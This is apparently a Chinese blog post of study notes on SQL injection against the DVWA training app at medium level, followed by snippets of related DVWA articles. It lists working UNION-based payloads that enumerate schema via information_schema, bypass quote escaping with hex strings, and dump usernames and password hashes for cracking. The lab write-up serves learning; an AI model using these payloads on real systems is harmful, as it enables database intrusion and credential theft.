SQL injection on DVWA (medium Level)

最新推荐文章于 2022-11-21 00:00:27 发布
最新推荐文章于 2022-11-21 00:00:27 发布
阅读量2.3k 收藏 1
点赞数 1
分类专栏: DVWA SQL Injection学习笔记 文章标签: SQL Injection DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youb11/article/details/45696603
版权

medium与low的区别在于对对输入的数据进行了转义处理,多了$id = mysql_real_escape_string($id);  这句。

在这里输入‘会有如下结果:


不用担心还有好多是可以用哒~~

输入1 or 1=1:


得到了所有id对应的用户。


接下来用union select

输入 1 or 1=1 union select 1,2--

可以正常输出

但是输入1 or 1=1 union select 1,2,3-- 却得到如下结果

说明这里的数据表是两列哟~~~


接下来就可以用user(),database(),version()查看信息了:



查询information_schema系统表,获得MySQL数据库中每一个表名以及每一列的名字


为了便于查找可以这样:

输入1 or 2=1 union select 1,concat(table_name,0x0a,column_name) from information_schema.columns,得到的结果为



以上结果还是很多,可以尝试如下办法获得MySQL中所有的数据库:

输入1 or 2=1 union select table_schema,null from information_schema.tables

显然这里用的数据库是dvwa~


既然已经知道数据库的名字,也就不用大海捞针揣测它各个表的名字了

输入1 or 2=1 union select table_name,null from information_schema.tables where table_schema=0x64767761    这个0x64767761是dvwa的十六进制表示

这里使用十六进制表示的因为这里应该填入数据库名,应该是一个字符串,如果写dvwa则要在它两端加上单引号,这样才会被识别为string,但是单引号会被过滤掉,所以直接写string会报错。



现在查看users这个表单中有哪些列(实际上前面以及找到了= =!重复一下又怎样)

输入:1 or 2=1 union select 1,concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

咳咳!后面table_name不能直接用users哦,会报错的

正确的输出是

users里面共有6列哟~


接下来获得用户名和密码:

输入1 or 2=1 union select 1,concat(first_name,0x0a,password) from users

也可以输入1 or 2=1 union select first_name,password from dvwa.users #   获得


在http://www.md5decrypter.com/上查一下

一些常用的密码hash破解是没有问题的



要个男盆友扭蛋
关注
专栏目录
DVWA靶场练习八—SQL Injection (Blind)
afei001
05-25 354
SQL盲注介绍 一般的SQL注入在输入注入语句时都会返回执行该语句的结果。而SQL盲注就好比在做“判断题”,注入语句的执行结果不会 直接回显出来,而是显示“对”或者“不对”,“存在”或者“不存在”。 低级(Low Level) 方法一:纯手工猜解注入 1.探测注入点 afei 说明存在注入点,并且是SQL盲注。 2.猜解数据库长度 猜解一般使用二分法。 语法: 1' and length(database())>猜...
DVWASQL Injection
小小郭的博客
01-10 219
根据自己的知识积累进行手工注入测试,若有说的不恰当的地方,还望指正~ 一、LOW等级 输入框输入单引号’,报错 证明有SQL注入 ‘ union select 1,2 # 可以看哪些数据可以回显 如果跟能回显的数据量不一样,则报错 查看所有数据库名称,'union select 1,group_concat(schema_name) from information_schema.schemata # 查看当前数据库 ,’ union select 1,database().
DVWA SQL Injection Medium
Ramona的博客
11-27 461
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.csdn.net/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
dvwaSQL Injection
kukudeshuo的博客
03-03 238
dvwaSQL Injection Security Level: low 由源代码可知,对字符串没有进行任何过滤 输入 1' and 1=1# 结果 ID: 1' and 1=1# First name: admin Surname: admin 输入 1' and 1=2# 结果为空白,说明存在SQL注入漏洞 判断字段数 1' order by 2# 结果: ID: 1' order by 2# First name: admin Surname: admin 1' order by 3
dvwasql injection
Alsn86的博客
01-18 268
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
DVWASQL Injection (Blind)
qq_39682037的博客
03-20 2202
盲注 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Security Level: low 测试流程 输入 1 输入 1 and 1=1 输入1’ 输入 1’ and 1=1 输入 1’ and 1=2 输入1’ and length(database())=1 输入1’ and leng...
DVWASQL注入(SQL Injection
qq_39682037的博客
03-20 2232
SQL注入(SQL InjectionSQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 Security Level: low 测试流程 输入1 输入2 输入1‘,无响应 输入1 and 1=1 输入1 and 1=2 故猜测sql语句结构为 select First name的列名 and Surname的列名 from ...
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 294
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
mysql 猜解字段,DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析
weixin_42610671的博客
03-17 693
一、DVWA-SQL Injection(Blind)测试分析SQL盲注 VS 普通SQL注入:普通SQL注入SQL盲注1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等2.一般在页面上直接就会显示执行sql语句的结果1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注...
DVWA下的SQL注入
07-25
SQL
DVWASQL Injection
weixin_42075643的博客
02-19 355
SQL注入基础知识
DVWA——SQL Injection
qq_41007744的博客
05-23 397
SQL InjectionLow&lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE ...
DVWA-SQL Injection
m0_49025459的博客
04-16 1795
LOW 判断注入是否存在 1' order by 2 # 1' order by 3 # 2的时候正常回显,但是3的时候报错,证明存在两个回显点,查询数据库 1' union select 1,database() # 查到数据库之后查询,查表名 1 union select 1,table_name from information_schema.tables where table_schema=database() # 两张表,先查表里的字段语句一样,改一下表.
DVWA sql注入-MEDIUM
m0_46616663的博客
05-25 530
1.判断是否存在sql注入漏洞 可以看到不是get型数据提交方式了,查询数据也变成了下拉表单的方式。 burpsuite抓包吧那就 常规判断有无注入及其类型 推测有转义符转义 为数字型注入 数据库字段为2 获取数据库信息 1'union select version(),@@version_compile_os# 查询用户名和数据库名 1 union select database(),user()# 爆表...
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 6337
DVWA-----SQL Injection(SQL手工注入)
DVWA sql注入 (Medium
gclome的博客
07-05 3172
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做mediumSQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
dvwa-SQL Injection
Alter__的博客
05-16 730
是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name,
dvwa medium sql注入
最新发布
10-26
1. 打开DVWA平台,选择SQL Injection选项卡,选择Medium级别。 2. 在输入框中输入一个单引号('),如果页面出现错误,则说明存在SQL注入漏洞。 3. 构造恶意的SQL语句,例如:' or 1=1#,这个语句的含义是选择所有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值